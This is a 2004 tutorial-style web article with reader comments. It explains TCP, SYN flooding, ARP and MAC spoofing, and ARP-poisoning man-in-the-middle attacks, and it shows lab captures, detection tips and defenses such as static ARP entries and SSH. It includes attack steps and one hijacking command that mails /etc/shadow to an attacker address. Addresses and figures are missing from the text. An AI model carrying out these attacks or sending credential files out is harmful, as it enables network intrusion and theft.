APLawrence.com -  Resources for Unix and Linux Systems, Bloggers and the self-employed


© May 2004 Amitesh Singh

Amitesh Singh(singh.amitesh@gmail.com, https://amitesh.cjb.net)
Mohit Bhatnagar(bhatnagar.mohit@gmail.com)
B.Tech(Indian School of Mines, INDIA)


Communication on LAN basically takes place through protocols like tcp/ip, udp/ip, arp, icmp etc and the most popular of these protocol is tcp/ip.


TCP(Transmission Control Protocol)


Data send on the network is in form of packets which contain information about source, target and data to be sent. TCP is a protocol developed to make sure that packets are not lost on the network as routers sent them from computer to computer. TCP splits a packet into little pieces, each piece is called a datagram.

A typical datagram looks like this :-


          IP HEADER
        TCP HEADER

Destination MAC, Source MAC
Dest IP, port and Source IP, port


The address of network card is called the MAC address. MAC address is a globally unique and unchangeable address which is stored on the network card itself. 


TCP HEADER FLAGS (that we care about)





Sending a packet with SYN flag means its sender wants to establish a three way TCP/IP connection with the destination system. Lets understand this in a better way

If you are A and the other one is B. You want a connection with B.




Now the TCP connection is established.




SYN Flooding is an attack in which large no. of SYN packets are sent to the target (victim) by an attacker with a fake IP address such that all the memory of the target gets hogged up in trying to establish a connection with the fake IP address which does not exist in the network.




As a result of SYN flooding all the services running on the attacked ports of the target computer are affected .The computer gets busy in sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large amount of SYN packets are sent, the target may get hanged or rebooted.


How the attack is done:


Windows is vulnerable to SYN-flood attack

Here is the state of when we flooded it from my computer ( by fake IP address( to the ports 25 and 139.The fake address must have your network ID (as here is it 169.254) and it should be non-existing. You can check its existence by pinging it).



Active Connections


  Proto  Local Address          Foreign Address        State




How to detect SYN Attack


When the Attacker system sends  SYN packet to the client, the client replies by sending SYN/ACK packet and it is waiting to receive an ACK, then the existing connection is said to be in the Half-open connection or client is said to be in the state of SYN_RECIEVED. It is the state, that one can use to detect whether his system is under SYN-floods or not. 


Arp a: another way to detect SYN attack


In previous attack, the ARP cache of is


Interface: on Interface 0x1000003

  Internet Address      Physical Address      Type          00-00-00-00-00-00     invalid         00-0c-6e-f1-9e-a3     dynamic  


As shown in the highlighted case, if the connection type is invalid and the MAC address is as shown above, it can be deduced that you are under SYN-floods.




Spoofing is a technique to disguise yourself as somebody else which may or may not exist in the network depending upon your choice. It forms the basics of attacking on the network. There are many types of spoofing like


In this paper I shall be discussing only ARP spoofing.



Any computer connected to the switched network (LAN) has two addresses.


MAC Address is the network card address and it is fixed. It is essential so that the Ethernet protocol (can be TCP/IP,UDP,FTP etc) can send data back and froth, independent of whatever application protocols are used on top of it. Ethernet builds frames of data and each frame has an Ethernet header, containing the MAC address of the source and the destination computer.

IP address is a virtual address of the computer on the network.




When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what is the MAC Address of the destination machine which it needs to create an Ethernet header. The only information it has available is the destination IP from the packets header. There must be a way for the Ethernet protocol to find the MAC Address of the destination machine, given a destination IP.


This is where ARP (Address Resolution Protocol) comes into play.



                                        Fig 1

Let us suppose A ( wants to connect to C ( then A will generate an ARP request packet and broadcast it to all the users on the network inquiring Is your IP address, if so then send your MAC address to me.


Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the

system. Only C with IP address will respond, by sending a packet containing the MAC address of C back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the high-level protocol communication can proceed.

To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association.


IF you want to know the MAC Address of the remote host, just type

C:/>nbtstat  -A  OR  nbtstat  a  chetan


Local Area Connection:

Node IPAddress: [] Scope Id: []


  NetBIOS Remote Machine Name Table

      Name               Type         Status



    CHETAN         <00>  UNIQUE      Registered

    CHETAN         <20>  UNIQUE      Registered

    MSHOME         <00>  GROUP       Registered

    MSHOME         <1E>  GROUP       Registered

    CHETAN         <01>  UNIQUE      Registered

    CHETAN         <03>  UNIQUE      Registered

    C_VERMA        <03>  UNIQUE      Registered


   MAC Address = 00-0C-6E-94-0A-BF




Frame extracts information about destination IP from IP header of the packet. Frame has no idea about the destination MAC Address because there should be a physical link layer between these two systems.                     

Switch maintains a table which matches switch port numbers to corresponding MAC Addresses. Table is created when switch is powered on by the transferring of first frame through switch port and source MAC Addresses.










This is the situation when no ARP request/reply or data transfer has taken place. Suppose H wants to connect to T1(refer Fig 3), an ARP request is broadcast over the LAN to all current users enquiring Is your IP X1, if so send me back your MAC Address. When this is passed through the switch the entry of Hs MAC Address is made in switchs cache. Now the table will look like












Obviously T1 responds with an ARP reply which is unicast to H which contains its own MAC Address. Moreover ARP cache of T1 will now make an entry of Hs IP address and MAC Address. Hence it sends ARP reply directly to H. As this reply will pass through the switch and port 1 down the cable, the cache of the switch will be updated to.











When ARP reply reaches the switch then the switch decides which port to send the frame to, comparing it with the destination address of the frame to an internet table which maps the port numbers to MAC Address. Now the frame will send down the cable through the port 3.




      As ARP is a stateless protocol, most operating systems will update their cache if a reply is received, regardless of whether they have sent an actual request.

We can exploit this bug.




To view your cache you can type arp a in the command prompt in Windows(& of course in Linux too).

C:/>arp  a


Interface: on Interface 0x1000003

  Internet Address      Physical Address      Type          00-50-ba-8e-ff-e8     dynamic       00-0b-2b-0d-fb-69     dynamic      00-50-fc-b0-f3-50     dynamic


  • IP address
  • 0x1000003the code for your interface(in that case eth0)
  • IP address of the remote device you are connected                                                  
  • 00-50-ba-8e-ff-e8the MAC address of that machine
  • dynamicthe link type




Let's observe the communication between my machine and got in my arp table its IP and MAC, it has in its arp table my IP and MAC. These values are updated once at 30 secs. If a malicious user sends me a spoofed packet which maps with a non-existent MAC, I wont be able to communicate with for at least 30 seconds!!. Enough for an attacker to hijack my session. This is called ARP Poisoning.

Now my ARP cache will look like

C:/>arp a


Interface: on Interface 0x1000003

  Internet Address      Physical Address      Type          00-50-ba-4e-ff-e3     invalid       00-0b-2b-0d-fb-69     dynamic      00-50-fc-b0-f3-50     dynamic






Obtaining MAC Address of another system without sending your real MAC Address or without entering your real MAC Address in another system ARP cache is MAC Spoofing.





                                                                      Fig 2


AIMH aims to know MAC of A without revealing his real MAC.


H broadcasts an ARP request over the network destined to reach A with a fake MAC Address Mf. Now there will be entry of Mf in the cache of switch corresponding to the port of H i.e. 2.Now A will send an ARP reply containing his real MAC address to H. When this frame reaches the switch the fake MAC address will be mapped to the port of H i.e. 2 and hence it is delivered to H. Now since the Ethernet card of H is in promiscuous mode, where it is allowed to examine frames that are destined for MAC address other than own, there will be entry of As real MAC address in Hs ARP cache.

In Linux, promiscuous mode can be enabled

# ifconfig eth0 promisc

and to disable it

# ifconfig eth0 -promisc






                                                                      Fig 3


Here H will try to insert itself between communication path of T1 and T2. H will forward frames between target computers so that communication is not interrupted.

H poisons ARP cache of T1 and T2 in this way

H sends a spoofed ARP reply to T1 containing T2s IP with Hs MAC.

Also at the same time he sends a spoofed ARP reply to T2 containing T1 IP with Hs MAC.

Now all T1 and T2 IP traffic will then go to H first instead of directly to each other.

How this attack performs

 As T1 & T2 are communicating with each other, T1s ARP cache contains T2 IP and MAC address and vice versa. H will poison the cache of T1 & T2. It sends a spoofed ARP reply to T1 containing T2s IP and Hs MAC and to T2, sends T1s IP and Hs MAC. Now in cache of T1, the IP address of T2 will be associated with the MAC address of H. When T1 want to send a packet it first splits into frames. The frame takes the destination IP from IP header of packet to be sent. It will take the MAC address from the cache. This frame having the IP address of T2 and MAC address of H will be sent to the switch by cable. Now the MAC address of frame will be mapped to the switchs port number in table i.e. cache of switch and as this port no. is 3 so frame will be sent to H. The same thing will happen in case of T2.Now H will forward the data coming from T1 to T2 and T2 to T1,so that connection between T1 & T2 will not interrupted without any trace.




To avoid this type of attack T1 should have static entry of T2s IP and MAC and T2 should have static entry of T1s IP and MAC in their respective caches.

T1 will make  a static entry of T2 in this way

C:/>arp s X2 M2




We performed this attack on LAN successfully:




IP Address





             Fedora Core(



Target 1

Windows 2000(Version 5.00.2195)

00:02:44:57: 7c:45


Target 2

Windows XP(Version





H sends spoofed ARP reply to T1 & T2.The ARP cache of T1 and T2 when they were spoofed:



Interface: --- 0x2

  Internet Address      Physical Address      Type           00-0c-f1-6b-78-4f     dynamic  


        We can see that in the cache of T1, IP address of T2 corresponds to Hs MAC.



Interface: on Interface 0x2

  Internet Address      Physical Address      Type           00-0c-f1-6b-78-4f     dynamic  



On hackers system, the receiving packets are:


23:42:02.474661 arp reply is-at 0:c:f1:6b:78:4f

23:42:04.084663 arp reply is-at 0:c:f1:6b:78:4f

23:42:04.484652 arp reply is-at 0:c:f1:6b:78:4f

23:42:06.094662 arp reply is-at 0:c:f1:6b:78:4f

23:42:06.494660 arp reply is-at 0:c:f1:6b:78:4f

23:42:08.104664 arp reply is-at 0:c:f1:6b:78:4f

23:42:08.504663 arp reply is-at 0:c:f1:6b:78:4f

23:42:10.114661 arp reply is-at 0:c:f1:6b:78:4f


         When was trying to connect to at the port 25, then the packet was passing through as shown below and hence it proves that is now in between T1 and T2.


23:42:46.294660 arp reply is-at 0:c:f1:6b:78:4f

23:42:46.694653 arp reply is-at 0:c:f1:6b:78:4f

23:42:46.705306> S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)


        Also when tried to troubleshoot using ping command, the datagram again passed through as shown below.


23:43:27.254104 > icmp: echo request [ttl 1]

23:43:28.504663 arp reply is-at 0:c:f1:6b:78:4f

23:43:28.904661 arp reply is-at 0:c:f1:6b:78:4f

23:43:30.266360 > icmp: echo request [ttl 1]

23:43:30.514657 arp reply is-at 0:c:f1:6b:78:4f

23:43:30.914662 arp reply is-at 0:c:f1:6b:78:4f

23:43:32.524663 arp reply is-at 0:c:f1:6b:78:4f

23:43:32.924654 arp reply is-at 0:c:f1:6b:78:4f

23:43:33.270757 > icmp: echo request [ttl 1]

23:43:34.534662 arp reply is-at 0:c:f1:6b:78:4f

23:43:34.935399 arp reply is-at 0:c:f1:6b:78:4f




As I mentioned above that MAC address cant change but Linux users can change their MAC address without spoofing software, using a single parameter ifconfig. We can exploit this

# ifconfig eth0 hw ether 00:0c:ff:4f:e8


In Windows2000/XP you can do it by using some softwares like SMAC etc.


This can be exploited as follows: H DOS attacks on T2 (refer Fig. 3), then assign himself IP and MAC of T2 receiving all frames from T1 intended for T2.










                                                               Fig 4



Let us suppose A has connected to server B as a root administrator using a TELNET or FTP service. A hacker H who is able to sniff around, will do ARP poisoning A and reset his settings to that of A  and then will be able to issue commands in place of A like mail hacker_1@greathackers.com</etc/shadow, its enough. The hacker must DOS A with either SYN flooding or ARP poisoning so that A will not be able to interfere in his attack by storming ARP requests.




Instead of making a telnet login A can SSH (Secured Shell) or SFTP login to avoid TCP/IP hijacking.


Amitesh Singh(singh.amitesh@gmail.com, https://amitesh.cjb.net)
Mohit Bhatnagar(bhatnagar.mohit@gmail.com)
B.Tech(Indian School of Mines, INDIA)

Got something to add? Send me email.

(OLDER)    <- More Stuff -> (NEWER)    (NEWEST)   

Printer Friendly Version



Inexpensive and informative Apple related e-books:

Take Control of Upgrading to El Capitan

Take Control of OS X Server

Photos for Mac: A Take Control Crash Course

Sierra: A Take Control Crash Course

iOS 8: A Take Control Crash Course

More Articles by © Amitesh Singh

Good article!

it sucks
u r an*\*****...........

---December 10, 2004

That's pretty stupid.

If you can write a better article, we're happy to publish it. If you want to add specific comments to make this better, we'll publish those too. But your stupid comment doesn't help anyone, does it?


---December 10, 2004

I found your artical very interesting and easy reading except for the fact that I could'nt see any images that are referred to in the artical. Could you please ensure that the images are available. Ta.

-- Ajay Kamath

---December 21, 2004

Wed Apr 13 10:36:16 2005: 337   anonymous

good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.

Wed Apr 13 10:36:17 2005: 338   anonymous

good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.

Sat Oct 15 07:48:52 2005: 1206   rajasekhar

ur article was very informative about the practical view of a network transmission,


Printer Friendly Version

Have you tried Searching this site?

This is a Unix/Linux resource website. It contains technical articles about Unix, Linux and general computing related subjects, opinion, news, help files, how-to's, tutorials and more.

Contact us

Printer Friendly Version

Anyone even peripherally involved with computers agrees that object-oriented programming (OOP) is the wave of the future. Maybe one in 50 of them has actually tried to use OOP – which has a lot to do with its popularity (Steve Steinberg)

Linux posts

Troubleshooting posts

This post tagged:



Unix/Linux Consultants

Skills Tests

Unix/Linux Book Reviews

My Unix/Linux Troubleshooting Book

This site runs on Linode